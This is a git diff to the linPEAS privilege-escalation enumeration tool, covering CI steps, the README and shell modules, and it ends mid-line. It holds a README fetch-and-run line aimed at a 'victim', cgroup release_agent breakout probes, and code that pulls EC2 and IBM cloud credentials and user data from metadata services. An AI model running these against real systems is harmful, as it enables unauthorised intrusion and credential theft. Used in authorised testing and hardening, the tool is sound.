diff --git a/.github/workflows/CI-master_tests.yml b/.github/workflows/CI-master_tests.yml index cb29333..4900faf 100644 --- a/.github/workflows/CI-master_tests.yml +++ b/.github/workflows/CI-master_tests.yml @@ -1,6 +1,10 @@ name: CI-master_test -on: +on: + pull_request: + branches: + - master + schedule: - cron: "5 4 * * SUN" @@ -194,8 +198,36 @@ jobs: run: linPEAS/linpeas.sh -h # Run linpeas as a test - - name: Run linpeas - run: linPEAS/linpeas.sh -a -D + - name: Run linpeas system_information + run: linPEAS/linpeas.sh -o system_information -a + + - name: Run linpeas container + run: linPEAS/linpeas.sh -o container -a + + - name: Run linpeas cloud + run: linPEAS/linpeas.sh -o cloud -a + + - name: Run linpeas procs_crons_timers_srvcs_sockets + run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a + + - name: Run linpeas network_information + run: linPEAS/linpeas.sh -o network_information -t -a + + - name: Run linpeas users_information + run: linPEAS/linpeas.sh -o users_information -a + + - name: Run linpeas software_information + run: linPEAS/linpeas.sh -o software_information -a + + - name: Run linpeas interesting_perms_files + run: linPEAS/linpeas.sh -o interesting_perms_files -a + + - name: Run linpeas interesting_files + run: linPEAS/linpeas.sh -o interesting_files -a + + # Too much time + #- name: Run linpeas api_keys_regex + # run: linPEAS/linpeas.sh -o api_keys_regex -r # Upload files for release - name: Upload linpeas.sh @@ -204,6 +236,12 @@ jobs: name: linpeas.sh path: linPEAS/linpeas.sh + - name: Upload linpeas_fat.sh + uses: actions/upload-artifact@v2 + with: + name: linpeas_fat.sh + path: linPEAS/linpeas_fat.sh + ## Linux bins - name: Upload linpeas_linux_386 uses: actions/upload-artifact@v2 @@ -330,6 +368,11 @@ jobs: uses: actions/download-artifact@v2 with: name: linpeas.sh + + - name: Download linpeas_fat.sh + uses: actions/download-artifact@v2 + with: + name: linpeas_fat.sh - name: Download linpeas_linux_386 uses: actions/download-artifact@v2 @@ -384,4 +427,3 @@ jobs: assets_path: . env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - diff --git a/linPEAS/README.md b/linPEAS/README.md index 1f89083..bed73a5 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas ```bash # Local network -sudo python -m http.server 80 #Host +sudo python3 -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl @@ -47,12 +47,6 @@ chmod +x linpeas_linux_amd64 ./linpeas_linux_amd64 ``` -```bash -# Execute from memory in Penelope session -# From: https://github.com/brightio/penelope -> run peass-ng -``` - ## Firmware Analysis If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options. @@ -107,7 +101,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from * - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took - **-d/-p/-i/-t** (Local Network Enumeration) - Linpeas can also discover and port-scan local networks -This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector. +**It's recommended to use the params `-a` and `-r` if you are looking for a complete and intensive scan**. ``` Enumerate and search Privilege Escalation vectors. @@ -119,11 +113,11 @@ This tool enum and search possible misconfigurations (known vulns, user, process -t Automatic network scan & Internet conectivity checks - This option writes to files -r Enable Regexes (this can take from some mins to hours) -P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - -D Debug mode + -D Debug mode Network recon: -t Automatic network scan & Internet conectivity checks - This option writes to files - -d Discover hosts using fping or ping. Ex: -d 192.168.0.1/24 + -d Discover hosts using fping or ping. Ex: -d 192.168.0.1/24 -p -d Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139 -i [-p ] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed @@ -136,10 +130,10 @@ This tool enum and search possible misconfigurations (known vulns, user, process Misc: -h To show this message - -w Wait execution between big blocks of checks + -w Wait execution between big blocks of checks -L Force linpeas execution -M Force macpeas execution - -q Do not show banner + -q Do not show banner -N Do not use colours ``` diff --git a/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh b/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh new file mode 100644 index 0000000..dc40ecf --- /dev/null +++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh @@ -0,0 +1,48 @@ + +search_for_regex(){ + title=$1 + regex=$2 + caseSensitive=$3 + + if [ "$caseSensitive" ]; then + i="i" + else + i="" + fi + + print_3title_no_nl "Searching $title..." + + if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + else + # Search in home direcoties (usually the slowest) + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in etc + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in opt + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in possible web folders (usually only 1 will exist) + timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in logs + timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in backups + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + + # Search in others folders (usually only /srv or /Applications will exist) + timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + fi + wait +} + + + +if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then + peass{REGEXES} +else + echo "Regexes to search for API keys aren't activated, use param '-r' " +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/1_system_information.sh b/linPEAS/builder/linpeas_parts/1_system_information.sh index 06bd7a1..c0eb806 100644 --- a/linPEAS/builder/linpeas_parts/1_system_information.sh +++ b/linPEAS/builder/linpeas_parts/1_system_information.sh @@ -21,42 +21,6 @@ else echo_not_found "sudo" fi echo "" -#-- SY) CVEs -print_2title "CVEs Check" - -#-- SY) CVE-2021-4034 -if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then - echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2021-3560 -polkitVersion=$(systemctl status polkit.service 2>/dev/null | grep version | cut -d " " -f 9) -if [ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 ] || [ "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1 ]; then - echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2022-0847 -#-- https://dirtypipe.cm4all.com/ -#-- https://stackoverflow.com/a/37939589 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17 - echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi - -#-- SY) CVE-2022-2588 -#-- https://github.com/Markakd/CVE-2022-2588 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19 - echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi -echo "" - #--SY) USBCreator if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then print_2title "USBCreator" @@ -83,9 +47,10 @@ print_2title "PATH" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses" if ! [ "$IAMROOT" ]; then echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" -else - echo "New path exported: $PATH" 2>/dev/null +fi + +if [ "$DEBUG" ]; then + echo "New path exported: $PATH" fi echo "" @@ -196,6 +161,10 @@ else echo_not_found "AppArmor" fi +#-- SY) LinuxONE +print_list "is linuxONE? ................... "$NC +( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x") + #-- SY) grsecurity print_list "grsecurity present? ............ "$NC ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") @@ -214,11 +183,11 @@ print_list "SELinux enabled? ............... "$NC #-- SY) Seccomp print_list "Seccomp enabled? ............... "$NC -([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) AppArmor print_list "AppArmor profile? .............. "$NC -(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," +(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN}," #-- SY) AppArmor print_list "User namespace? ................ "$NC @@ -226,7 +195,7 @@ if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,ena #-- SY) cgroup2 print_list "Cgroup2 enabled? ............... "$NC -([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) Gatekeeper if [ "$MACPEAS" ]; then diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh index 9f3b882..b97aca4 100644 --- a/linPEAS/builder/linpeas_parts/2_container.sh +++ b/linPEAS/builder/linpeas_parts/2_container.sh @@ -137,16 +137,48 @@ checkContainerExploits() { fi } +checkCreateReleaseAgent(){ + cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys + do + if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then + release_agent_breakout2="Yes (unshare with $subsys)"; + rm -rf /tmp/cgroup_3628d4 + break + fi + done +} + checkProcSysBreakouts(){ - if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi + run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null) + if ! [ "$run_unshare" = "Yes" ]; then + run_unshare="No" + fi + + if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then + release_agent_breakout1="Yes" + else + release_agent_breakout1="No" + fi + release_agent_breakout2="No" mkdir /tmp/cgroup_3628d4 mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null - if [ $? -eq 0 ]; then release_agent_breakout2="Yes"; else release_agent_breakout2="No"; fi + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + checkCreateReleaseAgent + fi + fi rm -rf /tmp/cgroup_3628d4 2>/dev/null core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)" - modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)" + modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)" panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)" panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)" binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)" @@ -258,8 +290,8 @@ if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" - if echo "$containerType" | grep -qi "docker"; then + print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')" + if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi print_list "Seccomp enabled? ............... "$NC @@ -269,7 +301,7 @@ if [ "$inContainer" ]; then (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," print_list "User proc namespace? ........... "$NC - if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi + if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi checkContainerExploits print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -278,7 +310,8 @@ if [ "$inContainer" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts" checkProcSysBreakouts - print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -345,6 +378,7 @@ if [ "$inContainer" ]; then capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" else cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" + echo $ITALIC"Run capsh --decode= to decode the capabilities"$NC fi echo "" diff --git a/linPEAS/builder/linpeas_parts/3_cloud.sh b/linPEAS/builder/linpeas_parts/3_cloud.sh index 59a32fd..7936cf8 100644 --- a/linPEAS/builder/linpeas_parts/3_cloud.sh +++ b/linPEAS/builder/linpeas_parts/3_cloud.sh @@ -7,7 +7,10 @@ GCP_BAD_SCOPES="/cloud-platform|/compute" exec_with_jq(){ if [ "$(command -v jq)" ]; then - $@ | jq; + $@ | jq 2>/dev/null; + if ! [ $? -eq 0 ]; then + $@; + fi else $@; fi @@ -20,6 +23,24 @@ check_gcp(){ fi } +check_do(){ + is_do="No" + if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then + is_do="Yes" + fi +} + +check_ibm_vm(){ + is_ibm_vm="No" + if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then + curl --connect-timeout 2 "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" > /dev/null 2>&1 + if [ "$?" -eq 0 ]; then + IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) ) + is_ibm_vm="Yes" + fi + fi +} + check_aws_ecs(){ is_aws_ecs="No" if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then @@ -34,11 +55,6 @@ check_aws_ecs(){ elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then is_aws_ecs="Yes"; - - - elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then - is_aws_ecs="Yes"; - fi if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then @@ -48,6 +64,7 @@ check_aws_ecs(){ check_aws_ec2(){ is_aws_ec2="No" + is_aws_ec2_beanstalk="No" if [ -d "/var/log/amazon/" ]; then is_aws_ec2="Yes" @@ -59,6 +76,10 @@ check_aws_ec2(){ is_aws_ec2="Yes" fi fi + + if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then + is_aws_ec2_beanstalk="Yes" + fi } check_aws_lambda(){ @@ -76,8 +97,13 @@ check_aws_ecs print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_ec2 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_lambda print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_do +print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_ibm_vm +print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," echo "" @@ -157,6 +183,11 @@ if [ "$is_gcp" = "Yes" ]; then echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network") echo " ============== " done + + echo "" + print_3title "User Data" + echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script") + echo "" echo "" print_3title "Service Accounts" @@ -259,7 +290,14 @@ if [ "$is_aws_ec2" = "Yes" ]; then echo "" print_3title "User Data" - eval $aws_req "http://169.254.169.254/latest/user-data" + eval $aws_req "http://169.254.169.254/latest/user-data"; echo "" + + echo "" + echo "EC2 Security Credentials" + exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo "" + + print_3title "SSM Runnig" + ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED}," fi fi @@ -275,3 +313,65 @@ if [ "$is_aws_lambda" = "Yes" ]; then printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi +if [ "$is_do" = "Yes" ]; then + print_2title "DO Droplet Enumeration" + + do_req="" + if [ "$(command -v curl)" ]; then + do_req='curl -s -f ' + elif [ "$(command -v wget)" ]; then + do_req='wget -q -O - ' + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$do_req" ]; then + URL="http://169.254.169.254/metadata" + printf "Id: "; eval $do_req "$URL/v1/id"; echo "" + printf "Region: "; eval $do_req "$URL/v1/region"; echo "" + printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo "" + printf "User data: "; eval $do_req "$URL/v1/user-data"; echo "" + printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo "" + printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces"; + printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip"; + printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip"; + printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags"; + printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features"; + fi +fi + +if [ "$is_ibm_vm" = "Yes" ]; then + print_2title "IBM Cloud Enumeration" + + if ! [ "$IBM_TOKEN" ]; then + echo "Couldn't get the metdata token:(" + + else + TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" + ACCEPT_HEADER="Accept: application/json" + URL="http://169.254.169.254/latest/meta-data" + + ibm_req="" + if [ "$(command -v curl)" ]; then + ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + elif [ "$(command -v wget)" ]; then + ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + print_3title "Instance Details" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" + + print_3title "Keys and User data" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" + + print_3title "Placement Groups" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" + + print_3title "IAM credentials" + exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" + fi + +fi diff --git a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh index 0a1d8c8..1d54671 100644 --- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh +++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh @@ -6,13 +6,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Cleaned proccesses print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" + if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then + echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users" + fi + if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," pslist=$(print_ps) else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do @@ -42,6 +47,33 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +CURRENT_USER_PIVOT_PID="" +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then + #-- PCS) Process opened by other users + print_2title "Processes whose PPID belongs to a different user (not root)" + print_info "You will know if a user can somehow spawn processes as a different user" + + # Function to get user by PID + get_user_by_pid() { + ps -p "$1" -o user | grep -v "USER" + } + + # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user + ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do + if [ "$ppid" = "0" ]; then + continue + fi + ppid_user=$(get_user_by_pid "$ppid") + if echo "$user" | grep -Eqv "$ppid_user|root$"; then + echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + if [ "$ppid_user" = "$USER" ]; then + CURRENT_USER_PIVOT_PID="$ppid" + fi + fi + done + echo "" +fi + if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then @@ -71,7 +103,13 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + if [ "$(ps -e -o user,command 2>/dev/null)" ]; then + for i in $(seq 1 1210); do + ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; + done; + sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; + rm "$temp_file"; + fi echo "" fi fi @@ -109,7 +147,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then program="" program=$(defaults read "$f" Program 2>/dev/null) if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program" ]; then echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; @@ -173,12 +211,12 @@ printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do fi done relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null) if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},"; else - echo "$s is executing some relative path" + echo "$s could be executing some relative path" fi fi fi @@ -249,6 +287,7 @@ if ! [ 